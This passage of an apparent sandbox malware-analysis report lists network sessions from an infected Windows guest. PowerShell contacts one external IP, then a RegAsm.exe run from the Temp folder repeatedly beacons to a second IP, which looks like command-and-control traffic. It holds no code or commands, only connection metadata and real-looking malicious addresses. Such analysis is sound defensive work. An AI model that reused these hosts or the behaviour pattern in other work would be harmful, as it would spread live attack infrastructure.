0 | 192.168.2.22 | 49167 | 83.172.144.37 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:05:22.500040054 CET | 70 | OUT | |
Jan 5, 2021 19:05:22.551645994 CET | 71 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49168 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:07.649980068 CET | 1143 | OUT | |
Jan 5, 2021 19:06:07.837934971 CET | 1143 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
10 | 192.168.2.22 | 49177 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:11.296993017 CET | 1155 | OUT | |
Jan 5, 2021 19:06:11.461579084 CET | 1155 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
100 | 192.168.2.22 | 49267 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
101 | 192.168.2.22 | 49268 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
102 | 192.168.2.22 | 49269 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
103 | 192.168.2.22 | 49270 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
104 | 192.168.2.22 | 49271 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
105 | 192.168.2.22 | 49272 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
106 | 192.168.2.22 | 49273 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
107 | 192.168.2.22 | 49274 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
108 | 192.168.2.22 | 49275 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
109 | 192.168.2.22 | 49276 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
11 | 192.168.2.22 | 49178 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:11.686949968 CET | 1156 | OUT | |
Jan 5, 2021 19:06:11.871412992 CET | 1157 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
110 | 192.168.2.22 | 49277 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
111 | 192.168.2.22 | 49278 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
112 | 192.168.2.22 | 49279 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
113 | 192.168.2.22 | 49280 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
114 | 192.168.2.22 | 49281 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
115 | 192.168.2.22 | 49282 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
116 | 192.168.2.22 | 49283 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
117 | 192.168.2.22 | 49284 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
118 | 192.168.2.22 | 49285 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
119 | 192.168.2.22 | 49286 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
12 | 192.168.2.22 | 49179 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:12.075634003 CET | 1157 | OUT | |
Jan 5, 2021 19:06:12.243051052 CET | 1158 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
120 | 192.168.2.22 | 49287 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
121 | 192.168.2.22 | 49288 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
122 | 192.168.2.22 | 49289 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
123 | 192.168.2.22 | 49290 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
124 | 192.168.2.22 | 49291 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
125 | 192.168.2.22 | 49292 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
126 | 192.168.2.22 | 49293 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
127 | 192.168.2.22 | 49294 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
128 | 192.168.2.22 | 49295 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
129 | 192.168.2.22 | 49296 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
13 | 192.168.2.22 | 49180 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:12.449877024 CET | 1159 | OUT | |
Jan 5, 2021 19:06:12.609106064 CET | 1159 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
130 | 192.168.2.22 | 49297 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
131 | 192.168.2.22 | 49298 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
132 | 192.168.2.22 | 49299 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
133 | 192.168.2.22 | 49300 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
134 | 192.168.2.22 | 49301 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
135 | 192.168.2.22 | 49302 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
136 | 192.168.2.22 | 49303 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
137 | 192.168.2.22 | 49304 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
138 | 192.168.2.22 | 49305 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
139 | 192.168.2.22 | 49306 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
14 | 192.168.2.22 | 49181 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:12.832798958 CET | 1160 | OUT | |
Jan 5, 2021 19:06:12.987730980 CET | 1161 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
140 | 192.168.2.22 | 49307 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
141 | 192.168.2.22 | 49308 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
142 | 192.168.2.22 | 49309 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
143 | 192.168.2.22 | 49310 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
144 | 192.168.2.22 | 49311 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
145 | 192.168.2.22 | 49312 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
146 | 192.168.2.22 | 49313 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
147 | 192.168.2.22 | 49314 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
148 | 192.168.2.22 | 49315 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
149 | 192.168.2.22 | 49316 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
15 | 192.168.2.22 | 49182 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:13.213063955 CET | 1161 | OUT | |
Jan 5, 2021 19:06:13.388159037 CET | 1162 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
150 | 192.168.2.22 | 49317 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
151 | 192.168.2.22 | 49318 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
152 | 192.168.2.22 | 49319 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
153 | 192.168.2.22 | 49320 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
154 | 192.168.2.22 | 49321 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
155 | 192.168.2.22 | 49322 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
156 | 192.168.2.22 | 49323 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
157 | 192.168.2.22 | 49324 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
158 | 192.168.2.22 | 49325 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
159 | 192.168.2.22 | 49326 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
16 | 192.168.2.22 | 49183 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:13.606386900 CET | 1163 | OUT | |
Jan 5, 2021 19:06:13.778989077 CET | 1163 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
160 | 192.168.2.22 | 49327 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
161 | 192.168.2.22 | 49328 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
162 | 192.168.2.22 | 49329 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
163 | 192.168.2.22 | 49330 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
164 | 192.168.2.22 | 49331 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
165 | 192.168.2.22 | 49332 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
166 | 192.168.2.22 | 49333 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
167 | 192.168.2.22 | 49334 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
168 | 192.168.2.22 | 49335 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
169 | 192.168.2.22 | 49336 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
17 | 192.168.2.22 | 49184 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:14.002546072 CET | 1164 | OUT | |
Jan 5, 2021 19:06:14.168911934 CET | 1164 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
170 | 192.168.2.22 | 49337 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
171 | 192.168.2.22 | 49338 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
172 | 192.168.2.22 | 49339 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
173 | 192.168.2.22 | 49340 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
174 | 192.168.2.22 | 49341 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
175 | 192.168.2.22 | 49342 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
176 | 192.168.2.22 | 49343 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
177 | 192.168.2.22 | 49344 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
178 | 192.168.2.22 | 49345 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
179 | 192.168.2.22 | 49346 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
18 | 192.168.2.22 | 49185 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:14.391398907 CET | 1165 | OUT | |
Jan 5, 2021 19:06:14.558085918 CET | 1166 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
180 | 192.168.2.22 | 49347 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
181 | 192.168.2.22 | 49348 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
182 | 192.168.2.22 | 49349 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
183 | 192.168.2.22 | 49350 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
184 | 192.168.2.22 | 49351 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
185 | 192.168.2.22 | 49352 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
186 | 192.168.2.22 | 49353 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
187 | 192.168.2.22 | 49354 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
188 | 192.168.2.22 | 49355 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
189 | 192.168.2.22 | 49356 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
19 | 192.168.2.22 | 49186 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:14.788464069 CET | 1166 | OUT | |
Jan 5, 2021 19:06:14.954180002 CET | 1167 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
190 | 192.168.2.22 | 49357 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
191 | 192.168.2.22 | 49358 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
192 | 192.168.2.22 | 49359 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49169 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:08.163208961 CET | 1144 | OUT | |
Jan 5, 2021 19:06:08.331588984 CET | 1145 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
20 | 192.168.2.22 | 49187 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:15.165872097 CET | 1168 | OUT | |
Jan 5, 2021 19:06:15.352806091 CET | 1168 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
21 | 192.168.2.22 | 49188 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
